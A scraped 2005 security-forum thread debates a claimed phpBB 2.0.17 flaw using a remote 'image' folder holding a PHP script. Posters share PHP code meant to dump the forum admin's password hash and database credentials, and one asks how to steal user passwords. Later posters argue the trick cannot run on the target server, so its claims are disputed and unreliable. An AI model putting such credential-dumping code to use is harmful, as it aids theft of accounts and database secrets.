Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 138
Members: 0
Total: 138
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.17 and most likely below Goto page 1, 2, 3, 4, 5Next
Post new topicReply to topic View previous topic :: View next topic
phpBB 2.0.17 and most likely below
PostPosted: Wed Aug 10, 2005 8:06 pm Reply with quote
darkclaw
Regular user
Regular user
Joined: Aug 04, 2005
Posts: 14




PhpBB - [img][/img] vulnerability

Affected: phpBB 2.0.17 and most likely below.

Discovered by: Easyex.

Create a folder on a remote host like 'exploit.jpg' and then we would put the following in our signature:

Code:
[img]http://theremotehost.com/exploit.jpg[/img]


Inside the exploit.jpg folder we would have index.php or index.html with malicious code.
View user's profile Send private message
PostPosted: Thu Aug 11, 2005 1:12 am Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




any examples of the malicious html code?
View user's profile Send private message
PostPosted: Thu Aug 11, 2005 10:17 am Reply with quote
Tomanas
Active user
Active user
Joined: Jan 30, 2005
Posts: 29




yeah, i would be interesting what kind of malicious code you can insert Wink
----edit:
well i tried to insert this script:
<?
echo 'HOST: '.$dbhost.'<BR>dbNm: '.$dbname.'<BR>USER: '.$dbuser.'<BR>PASS: '.$dbpasswd.'<BR>TABLE PREFIX: '.$table_prefix;
?>
But nothing happened.....one more question, from where did you got this vuln ?
----edit 2:
man, you made a "little" mistake, Easyex found a bbcode img vuln *NOT* in the phpBB, but *IN* the php fusion.......shit, man, you made me laugh...
Here's the poc: http://www.milw0rm.com/id.php?id=1135
View user's profile Send private message
PostPosted: Thu Aug 11, 2005 2:43 pm Reply with quote
darkclaw
Regular user
Regular user
Joined: Aug 04, 2005
Posts: 14




Tomanas wrote:
yeah, i would be interesting what kind of malicious code you can insert Wink
----edit:
well i tried to insert this script:
<?
echo 'HOST: '.$dbhost.'<BR>dbNm: '.$dbname.'<BR>USER: '.$dbuser.'<BR>PASS: '.$dbpasswd.'<BR>TABLE PREFIX: '.$table_prefix;
?>
But nothing happened.....one more question, from where did you got this vuln ?
----edit 2:
man, you made a "little" mistake, Easyex found a bbcode img vuln *NOT* in the phpBB, but *IN* the php fusion.......shit, man, you made me laugh...
Here's the poc: http://www.milw0rm.com/id.php?id=1135


If you don't know what you're saying then please shut up:
http://dark-assassins.com/forum/viewtopic.php?t=248
View user's profile Send private message
PostPosted: Thu Aug 11, 2005 6:36 pm Reply with quote
Tomanas
Active user
Active user
Joined: Jan 30, 2005
Posts: 29




no hard feelings nigga ;-] when i googled, at first i found that it's a php-fusion exploit, so nevermind Wink
View user's profile Send private message
PostPosted: Sat Aug 13, 2005 12:09 am Reply with quote
LordLucan
Beginner
Beginner
Joined: Aug 13, 2005
Posts: 1




I need a little help here as I am new to php. Does this just run the html or php file in the browsers of the people using the forum or can the index.php file be used to interact with the forum database?

If the index.php file can interact with the database could someone post an example of some code that could be saved as index.php that would allow me to do this? For example to extract users passwords.

Sorry if this sounds like a typical newbies "teach me to hack" question but I would appreciate anyone helping me to learn.

If it just runs the file in the users browser what sort of code could be used? Would it just be something like using IE Exploiter code to download trojans on to the users machines or what?

Much thanks to anyone who can hellp me learn Smile
View user's profile Send private message
PostPosted: Sat Aug 13, 2005 10:51 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Wow this is the most confussing post.... Well I dont care so if I added something along the lines of this perhaps
Code:
<?php

define('IN_PHPBB', true);
$phpbb_root_path = '';
include($phpbb_root_path . '/extension.inc');
include($phpbb_root_path . '/db/mysql.'.$phpEx);
include($phpbb_root_path . '/common.'.$phpEx);
?>

<b><h2>Do Not Worry About the Errors Above. The Information you Want is below :)</h2></b>

<h4>
Admin Forum Information: </h4>
<?php
$uid = '2';

$sql = "SELECT user_id, username, user_password, user_email
FROM ". USERS_TABLE ."
WHERE user_id = $uid";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql);
}

echo "<table>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "\t<tr>\n";
foreach ($line as $col_value)
{
echo "\t\t<td> $col_value </td>\n";
}
echo "\t<tr>\n";
}
echo "</table>\n";
?>
<h4>
Database Information:<br/></h4>
Database Type = <?php echo $dbms;?><br/>
DB Host = <?php echo $dbhost;?><br/>
DB Name = <?php echo $dbname;?><br/>
DB User = <?php echo $dbuser;?><br/>
DB Password = <?php echo $dbpasswd;?><br/>
DB Table Prefix = <?php echo $table_prefix;?><br/>
<p>
<p>
<?php print "Document root is ".$_SERVER["DOCUMENT_ROOT"]."<br />";
print "This page is called ".$_SERVER["PHP_SELF"]; ?>
<p>
<p>
<p>
<p>
<h4>And here is a load of useful info</h4></p>
<?php
print_r($_SERVER);
?>
<p>
<p>

<?php
print $_SERVER[""];#Built in Variable name
?>


into a file called index.php in http://remotehost.com/hello.jpg/ directory then linked the dir to my avatar it might work or it does work? (Im Away from my local testing station)

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
XSS
PostPosted: Sun Aug 14, 2005 9:03 am Reply with quote
beford
Beginner
Beginner
Joined: Aug 01, 2005
Posts: 2




i havn't tested this, but i dont think that it will allow any server side php execution. I guess that it's only for XSS. (steal cookies)
View user's profile Send private message
PostPosted: Sun Aug 14, 2005 8:52 pm Reply with quote
Tomanas
Active user
Active user
Joined: Jan 30, 2005
Posts: 29




yeah, as i was talking to this bug's founder, he said, that it's impossible to get info from let a say config.php.....so i think it's just ant xss bug....well, lets wait for a genius, who will write something useful....Smile
View user's profile Send private message
PostPosted: Wed Aug 17, 2005 3:02 pm Reply with quote
lunix
Regular user
Regular user
Joined: Aug 17, 2005
Posts: 16




This is silly. Its obvious that it has no potential at all.
The person who claims they "discovered an exploit" needs a slap
From reading the posts it looks like you people dont even know HTML.

By putting a url between [bbcode] you are simulating html.
The scripts will then replace [img] with <img src=" and [/img] with ">

This means the browser is expecting an image and will treat the data it recieves as an image. It will not include any php, it will not render html, it will not execute javascript. It will only display an image.
The only way this would work is if you use a php script that produces an image (GD library), and that has no potential for an exploit either.

The complete lack of any POC makes me think the the person who claimed to have discovered an exploit knows absolutly nothing.

now, Think about it. Rolling Eyes
Damn skiddies.... people dont even think any more.

thanks.
View user's profile Send private message Visit poster's website
PostPosted: Thu Aug 18, 2005 6:26 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




We are not all script kiddies here mate Wink

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Aug 19, 2005 10:51 am Reply with quote
Easyex
Regular user
Regular user
Joined: Aug 19, 2005
Posts: 6




Obviously you don't know what your talking about.

It wont run a php script will it? Ahh yes that's why i have already showed proof to PhpBB's support team (NeoThermic) and they came up with even more ways to fake an image and enter data via a php file and execute it so.. yeah think again before you speak.

NeoThermic from PhpBB confirmed the vuln, but you wont be able to gain access it simply loads the php script file from a remote server.. (you can get the header to send to a logout, and do other pointless stuff)

Regards,

Easyex.
View user's profile Send private message
PostPosted: Fri Aug 19, 2005 4:30 pm Reply with quote
lunix
Regular user
Regular user
Joined: Aug 17, 2005
Posts: 16




The PHP will NOT be run on the server you are trying to exploit.
It will be run on YOUR server. so there is no XSS possability.
Then the image headers are sent to the browsers and an image is downloaded.
OMFG!! AN IMAGE!! 1337!!! Rolling Eyes

post the POC if yor so sure its an exploit. Seems so be a lot of guff and no substance.

People have been using php images for years.
The script is NOT being run on in target server, its run in your server.
The script is NOT included in the page on the remote server, an image is downloaded client side. This has no more potential that an ordinary png image.

BTW.
if it is an exploit or flaw (which is ins't) then it will be impossible to patch it without banning images completely.
View user's profile Send private message Visit poster's website
PostPosted: Fri Aug 19, 2005 4:50 pm Reply with quote
Easyex
Regular user
Regular user
Joined: Aug 19, 2005
Posts: 6




Go talk to NeoThermic from PhpBB and then find out.

No it does not execute on the PhpBB server.

It executes once the page is loaded, It wont show javascript, it wont show the php script it will only execute what ever is inside it.

And i'll say it again go get in contact with NeoThermic from PhpBB's support team and he will tell you the same thing i have.

You cant gain access to PhpBB but you can still do certian things with it.

We already tested this and PhpBB confirmed it, Would PhpBB confirm it if it didn't work? ...

So shut up already you fool.
View user's profile Send private message
PostPosted: Fri Aug 19, 2005 5:01 pm Reply with quote
lunix
Regular user
Regular user
Joined: Aug 17, 2005
Posts: 16




post a proof of concept code then if your so confident this will have an effect.

we tried every possability 18 months ago, nothing would work.
Because you are using img tags it only has the ability to display an image, so image headers are sent. That means the browser will only treat what it recieves as an image. nothing executes client side or server side.
Only the script on your server will run, and it can only output an image.

If this has any chance of working then ALL images would work, not just gd library.

By using a folder called image.gif and putting the script in it as index.php you are simulating the mod_rewrite function of linux servers.
Nothing more.

so, lets see some proof of concept.
View user's profile Send private message Visit poster's website
phpBB 2.0.17 and most likely below
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 5
Goto page 1, 2, 3, 4, 5Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds